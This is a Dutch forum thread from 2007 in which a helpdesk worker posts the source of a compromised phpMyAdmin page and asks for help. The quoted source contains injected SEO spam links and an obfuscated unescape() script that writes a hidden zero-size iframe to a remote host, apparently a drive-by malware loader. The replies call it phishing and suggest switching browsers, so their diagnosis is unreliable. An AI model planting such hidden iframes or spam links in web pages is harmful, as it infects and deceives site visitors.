login  Naam:   Wachtwoord: 
Registreer je!
 Forum

phpMyAdmin hack ??

Offline mortalsin - 20/09/2007 13:43
Avatar van mortalsinOnbekend beste mensen ik voor kort voor een bedrijfje wat mij als helpdesk heeft gebombardeerd

nu is het volgende het geval
die beste man wilde op de phpMyAdmin inloggen maar kon dat niet en kreeg iets totaal anders iets met phishing .

nu uis het zo dat ik totaal onbekend ben met deze dingen dus vroeg ik me af of iemand hier iets van afweet de source heb ik toegevoegd

  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"
  2. 2 " http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
  3. 3<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
  4. 4<head>
  5. 5<title>phpMyAdmin 2.6.0-pl3 - www.hetbedrijfje.net </title>
  6. 6<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  7. 7<link rel="stylesheet" type="text/css" href="./css/phpmyadmin.css.php?lang=en-utf-8&amp;js_frame=right" />
  8. 8</head>
  9. 9
  10. 10<script type="text/javascript">
  11. 11<!--
  12. 12 document.writeln('<frameset cols="200,*" rows="*" border="1" frameborder="1" framespacing="0" name="mainFrameset" id="mainFrameset">');
  13. 13 document.writeln(' <frameset rows="100, *" framespacing="0" frameborder="0" border="0" name="leftFrameset" id="leftFrameset">');
  14. 14 document.writeln(' <frame src="queryframe.php?lang=en-utf-8&amp;server=1&amp;collation_connection=latin1_swedish_ci&amp;hash=66b6b4e0b4e8cce18a543da6f6f98bf01190276289" name="queryframe" frameborder="0" scrolling="no" />');
  15. 15 document.writeln(' <frame src="left.php?lang=en-utf-8&amp;server=1&amp;collation_connection=latin1_swedish_ci&amp;hash=66b6b4e0b4e8cce18a543da6f6f98bf01190276289" name="nav" frameborder="0" />');
  16. 16 document.writeln(' </frameset>');
  17. 17 document.writeln(' <frame src="main.php?lang=en-utf-8&amp;server=1&amp;collation_connection=latin1_swedish_ci" name="phpmain66b6b4e0b4e8cce18a543da6f6f98bf01190276289" border="0" frameborder="0" style="border-left: 1px solid #000000;" />');
  18. 18 document.writeln(' <noframes>');
  19. 19 document.writeln(' <body bgcolor="#FFFFFF">');
  20. 20 document.writeln(' <p>phpMyAdmin is more friendly with a <b>frames-capable</b> browser.</p>');
  21. 21 document.writeln(' <p><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/">Online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-applications.html">online job applications </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-application-in.html">online job application in </a> <a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-application-for.html">online job application for </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-application.html">online job application </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-searches.html">online job searches </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/work-at-home-online-job.html">work at home online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/home-online-job.html">home online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-search.html">online job search </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/data-entry-online-job.html">data entry online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-at-home.html">online job at home </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/freelance-online-job.html">freelance online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/apply-online-job.html">apply online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-application-for-home-depot.html">online job application for home depot </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/home-depot-online-job-application.html">home depot onlinejob application </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/part-time-online-job.html">part time online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/sears-online-job-application.html">sears online job application</a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/map.html">Online job for you</a><a href="http://emissary.wm.edu/EE/cache/index.html">Manager</a><a href="http://emissary.wm.edu/EE/cache/map.html">Map</a><a href="http://emissary.wm.edu/EE/cache/office-manager-job-descriptions.html">office manager job descriptions </a><a href="http://emissary.wm.edu/EE/cache/office-manager-job.html">office manager job </a><a href="http://emissary.wm.edu/EE/cache/sales-manager-job-descriptions.html">sales manager job descriptions </a><a href="http://emissary.wm.edu/EE/cache/sales-manager-job.html">sales manager job </a><a href="http://emissary.wm.edu/EE/cache/office-manager-job-description.html">office manager job description </a><a href="http://emissary.wm.edu/EE/cache/project-manager-job-descriptions.html">project manager job descriptions </a><a href="http://emissary.wm.edu/EE/cache/project-manager-job.html">project manager job </a><a href="http://emissary.wm.edu/EE/cache/projects-manager-job-description.html">project manager job description </a><a href="http://emissary.wm.edu/EE/cache/human-resources-manager-job.html">human resources manager job </a><a href="http://emissary.wm.edu/EE/cache/sales-manager-job-description.html">sales manager job description </a><a href="http://emissary.wm.edu/EE/cache/resource-manager-job-description.html">resource manager job description</a> <a href="http://emissary.wm.edu/EE/cache/human-resources-manager-job-descriptions.html">human resources manager job descriptions </a><a href="http://emissary.wm.edu/EE/cache/project-manager-job.html">human resources manager job description</a><a href="http://emissary.wm.edu/EE/cache/manager-job-information.html">manager job information</a><br>
  22. 22</p></body>');
  23. 23 document.writeln(' </noframes>');
  24. 24 document.writeln('</frameset>');
  25. 25//-->
  26. 26</script>
  27. 27
  28. 29<frameset cols="200,*" rows="*" border="1" frameborder="1" framespacing="0" name="mainFrameset" id="mainFrameset">
  29. 30 <frameset rows="100, *" framespacing="0" frameborder="0" border="0" name="leftFrameset" id="leftFrameset">
  30. 31 <frame src="queryframe.php?lang=en-utf-8&amp;server=1&amp;collation_connection=latin1_swedish_ci&amp;hash=66b6b4e0b4e8cce18a543da6f6f98bf0" name="queryframe" frameborder="0" scrolling="no" />
  31. 32 <frame src="left.php?lang=en-utf-8&amp;server=1&amp;collation_connection=latin1_swedish_ci&amp;hash=66b6b4e0b4e8cce18a543da6f6f98bf0" name="nav" frameborder="0" />
  32. 33 </frameset>
  33. 34 <frame src="main.php?lang=en-utf-8&amp;server=1&amp;collation_connection=latin1_swedish_ci" name="phpmain66b6b4e0b4e8cce18a543da6f6f98bf0" frameborder="0" />
  34. 35
  35. 37 <body bgcolor="#FFFFFF">
  36. 38 <p>phpMyAdmin is more friendly with a <b>frames-capable</b> browser.</p>
  37. 39 <p><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/">Online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-applications.html">online job applications </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-application-in.html">online job application in </a> <a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-application-for.html">online job application for </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-application.html">online job application </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-searches.html">online job searches </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/work-at-home-online-job.html">work at home online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/home-online-job.html">home online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-search.html">online job search </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/data-entry-online-job.html">data entry online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-at-home.html">online job at home </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/freelance-online-job.html">freelance online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/apply-online-job.html">apply online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/online-job-application-for-home-depot.html">online job application for home depot </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/home-depot-online-job-application.html">home depot onlinejob application </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/part-time-online-job.html">part time online job </a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/sears-online-job-application.html">sears online job application</a><a href="http://www.hsutx.edu/student_life/brand/wp-content/uploads/map.html">Online job for you</a><a href="http://emissary.wm.edu/EE/cache/index.html">Manager</a><a href="http://emissary.wm.edu/EE/cache/map.html">Map</a><a href="http://emissary.wm.edu/EE/cache/office-manager-job-descriptions.html">office manager job descriptions </a><a href="http://emissary.wm.edu/EE/cache/office-manager-job.html">office manager job </a><a href="http://emissary.wm.edu/EE/cache/sales-manager-job-descriptions.html">sales manager job descriptions </a><a href="http://emissary.wm.edu/EE/cache/sales-manager-job.html">sales manager job </a><a href="http://emissary.wm.edu/EE/cache/office-manager-job-description.html">office manager job description </a><a href="http://emissary.wm.edu/EE/cache/project-manager-job-descriptions.html">project manager job descriptions </a><a href="http://emissary.wm.edu/EE/cache/project-manager-job.html">project manager job </a><a href="http://emissary.wm.edu/EE/cache/projects-manager-job-description.html">project manager job description </a><a href="http://emissary.wm.edu/EE/cache/human-resources-manager-job.html">human resources manager job </a><a href="http://emissary.wm.edu/EE/cache/sales-manager-job-description.html">sales manager job description </a><a href="http://emissary.wm.edu/EE/cache/resource-manager-job-description.html">resource manager job description</a> <a href="http://emissary.wm.edu/EE/cache/human-resources-manager-job-descriptions.html">human resources manager job descriptions </a><a href="http://emissary.wm.edu/EE/cache/project-manager-job.html">human resources manager job description</a><a href="http://emissary.wm.edu/EE/cache/manager-job-information.html">manager job information</a><br>
  38. 40</p></body>
  39. 41 </noframes>
  40. 44
  41. 45</html>
  42. 46<SCRIPT Language="JavaScript">
  43. 47 document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%30%33%69%6E%63%2E%70%72%69%2E%65%65%2F%78%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22 %66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22 %77%69%64%74%68%3D%30 %68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%0A"));
  44. 48</SCRIPT>

2 antwoorden

Gesponsorde links
Offline Stijn - 20/09/2007 14:59
Avatar van Stijn PHP expert Je eerste zin klopt niet.

Misschien helpt het om phpmyadmin te gebruiken via firefox en niet via internet explorer.
Offline Wim - 20/09/2007 17:54
Avatar van Wim Crew algemeen nog nooit van phishing gehoord en je doet de helpdesk van een bedrijf..... great...

Phishing is een "valse" website, meestal om passwords of credit card nummers te achterhalen. De nagemaakte websites zien er net hetzelfde uit als de echte, maar deze zullen je gegevens opslaan. De gebruiker zal echter niets merken omdat de POST informatie geforward wordt naar de echte site.

Een mooi voorbeeld van een phishing site zou bvb een valse paypal site zijn. een mooie url hiervoor zou paipal.com, paiypal.com zijn, iets wat iig niet onmiddelijk in het oog springt. Deze website zal een volledige copy van de loginpagina van paypal zijn, meestal inclusief de subpagina's. Je logt in op deze valse (phishing)site, je gegevens worden in de hacker zijn database bewaard, en je wordt geforward naar de echte paypal.com en je zal automatisch inloggen waardoor je niets vermoed.

Hopelijk is de term "phishing" nu een beetje verduidelijkt voor je, en kan je zoeken naar een oplossing
Gesponsorde links
Dit onderwerp is gesloten.
Actieve forumberichten
© 2002-2024 Sitemasters.be - Regels - Laadtijd: 0.18s